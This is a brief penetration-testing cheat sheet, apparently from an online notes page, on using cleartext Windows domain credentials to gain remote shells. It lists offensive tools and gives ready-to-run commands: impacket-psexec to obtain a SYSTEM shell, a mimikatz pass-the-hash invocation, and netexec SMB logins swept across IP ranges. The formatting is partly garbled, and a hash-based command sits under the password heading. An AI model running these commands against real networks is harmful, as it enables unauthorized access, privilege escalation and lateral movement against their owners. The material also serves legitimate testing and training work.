Cleartext Password
Cleartext Password
Tools: psexec.exe , impacket tools , mimikatz , crackmapexec/netexec , evil-winrm , xfreerdp , mssqlclient
Interactive shell
psexec.exe -AcceptEULA \\IP
impacket-psexec DOMAIN/USER:PASSWORD@IPThis grants NT Authority/System shell (System/Admin access)
mimikatz "privilege::debug sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH"Pseudo-shell (File write and read)
netexec smb IP_RANGE -u USER -p PASSWORD -d DOMAIN
netexec smb IP_RANGE -u USER -p PASSWORD --local-authNote: These 2 techniques grant shell as the NT Authority/System user
These techniques grant System/Admin access
WinRM
RDP
SMB
MSSQL
Last updated